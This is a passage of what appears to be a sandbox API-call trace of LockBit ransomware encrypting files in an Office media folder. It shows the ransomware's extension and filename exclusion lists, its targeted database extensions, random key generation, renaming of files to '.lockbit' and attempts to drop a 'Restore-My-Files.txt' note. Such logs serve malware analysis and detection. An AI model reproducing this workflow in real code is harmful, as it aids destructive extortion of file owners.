ftCreationTime.dwLowDateTime=0x11ec5600, ftCreationTime.dwHighDateTime=0x1bd4c14, ftLastAccessTime.dwLowDateTime=0xbd180ea0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x11ec5600, ftLastWriteTime.dwHighDateTime=0x1bd4c14, nFileSizeHigh=0x0, nFileSizeLow=0x585a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ELPHRG01.WAV", cAlternateFileName="")) returned 1 [0196.281] lstrcmpiW (lpString1=".", lpString2="ELPHRG01.WAV") returned -1 [0196.281] lstrcmpiW (lpString1="..", lpString2="ELPHRG01.WAV") returned -1 [0196.281] PathFindExtensionW (pszPath="ELPHRG01.WAV") returned=".WAV" [0196.281] lstrcmpiW (lpString1=".386", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".cmd", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".exe", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".ani", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".adv", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".theme", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".msi", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".msp", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".com", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".diagpkg", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".nls", lpString2=".WAV") returned -1 [0196.281] lstrcmpiW (lpString1=".diagcab", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".lock", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".ocx", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".mpa", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".cpl", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".mod", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".hta", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".icns", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".prf", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".rtp", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".diagcfg", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".msstyles", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".bin", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".hlp", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".shs", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".drv", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".wpx", lpString2=".WAV") returned 1 [0196.282] lstrcmpiW (lpString1=".bat", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".rom", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".msc", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".spl", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".ps1", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".msu", lpString2=".WAV") returned -1 [0196.282] lstrcmpiW (lpString1=".ics", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".key", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".mp3", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".reg", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".dll", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".ini", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".idx", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".sys", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".hlp", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".ico", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".lnk", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".rdp", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".lockbit", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ELPHRG01.WAV") returned 1 [0196.283] lstrcmpiW (lpString1="ntldr", lpString2="ELPHRG01.WAV") returned 1 [0196.283] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ELPHRG01.WAV") returned 1 [0196.283] lstrcmpiW (lpString1="bootsect.bak", lpString2="ELPHRG01.WAV") returned -1 [0196.283] lstrcmpiW (lpString1="autorun.inf", lpString2="ELPHRG01.WAV") returned -1 [0196.283] lstrcmpiW (lpString1="thumbs.db", lpString2="ELPHRG01.WAV") returned 1 [0196.283] lstrcmpiW (lpString1="iconcache.db", lpString2="ELPHRG01.WAV") returned 1 [0196.283] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV") returned=".WAV" [0196.283] lstrcmpiW (lpString1=".rar", lpString2=".WAV") returned -1 [0196.283] lstrcmpiW (lpString1=".zip", lpString2=".WAV") returned 1 [0196.284] lstrcmpiW (lpString1=".7z", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".ckp", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".dacpac", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".db", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".db-shm", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".db-wal", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".db3", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".dbf", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".dbc", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".dbs", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".dbt", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".dbv", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".frm", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".mdf", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".mrg", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".mwb", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".myd", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".ndf", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".qry", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".sdb", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".sdf", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".sql", lpString2=".WAV") returned -1 [0196.284] lstrcmpiW (lpString1=".sqlite", lpString2=".WAV") returned -1 [0196.285] lstrcmpiW (lpString1=".sqlite3", lpString2=".WAV") returned -1 [0196.285] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WAV") returned -1 [0196.285] lstrcmpiW (lpString1=".tmd", lpString2=".WAV") returned -1 [0196.285] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV.lockbit") returned 70 [0196.285] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\elphrg01.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0196.291] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.291] malloc (_Size=0x40068) returned 0x3df0008 [0196.291] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22618) returned 1 [0196.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.292] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.298] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.298] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.298] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.299] free (_Block=0x1fa2ed8) [0196.299] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\ELPHRG01.WAV" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.300] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.300] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.300] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63c1b400, ftCreationTime.dwHighDateTime=0x1bd216e, ftLastAccessTime.dwLowDateTime=0xbd3e24a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x63c1b400, ftLastWriteTime.dwHighDateTime=0x1bd216e, nFileSizeHigh=0x0, nFileSizeLow=0x3602, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0088542.WMF", cAlternateFileName="")) returned 1 [0196.300] lstrcmpiW (lpString1=".", lpString2="J0088542.WMF") returned -1 [0196.300] lstrcmpiW (lpString1="..", lpString2="J0088542.WMF") returned -1 [0196.300] PathFindExtensionW (pszPath="J0088542.WMF") returned=".WMF" [0196.300] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.300] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.301] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.301] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.302] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0088542.WMF") returned 1 [0196.302] lstrcmpiW (lpString1="ntldr", lpString2="J0088542.WMF") returned 1 [0196.302] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0088542.WMF") returned 1 [0196.302] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0088542.WMF") returned -1 [0196.303] lstrcmpiW (lpString1="autorun.inf", lpString2="J0088542.WMF") returned -1 [0196.303] lstrcmpiW (lpString1="thumbs.db", lpString2="J0088542.WMF") returned 1 [0196.303] lstrcmpiW (lpString1="iconcache.db", lpString2="J0088542.WMF") returned -1 [0196.303] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.303] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF") returned=".WMF" [0196.303] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.303] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.303] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.304] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.304] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF.lockbit") returned 70 [0196.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0088542.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0196.311] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.311] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.311] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=13826) returned 1 [0196.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.312] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.314] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.314] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.314] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.316] free (_Block=0x1fa2ed8) [0196.316] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0088542.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.316] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.316] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.316] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ad6a00, ftCreationTime.dwHighDateTime=0x1bcf887, ftLastAccessTime.dwLowDateTime=0xbd3e24a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x68ad6a00, ftLastWriteTime.dwHighDateTime=0x1bcf887, nFileSizeHigh=0x0, nFileSizeLow=0x8880, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090070.WMF", cAlternateFileName="")) returned 1 [0196.317] lstrcmpiW (lpString1=".", lpString2="J0090070.WMF") returned -1 [0196.317] lstrcmpiW (lpString1="..", lpString2="J0090070.WMF") returned -1 [0196.317] PathFindExtensionW (pszPath="J0090070.WMF") returned=".WMF" [0196.317] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.317] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.318] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.318] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090070.WMF") returned 1 [0196.319] lstrcmpiW (lpString1="ntldr", lpString2="J0090070.WMF") returned 1 [0196.319] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090070.WMF") returned 1 [0196.319] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090070.WMF") returned -1 [0196.319] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090070.WMF") returned -1 [0196.319] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090070.WMF") returned 1 [0196.319] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090070.WMF") returned -1 [0196.319] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.319] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0090070.WMF") returned=".WMF" [0196.319] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.319] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.319] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.320] lstrcmpiW 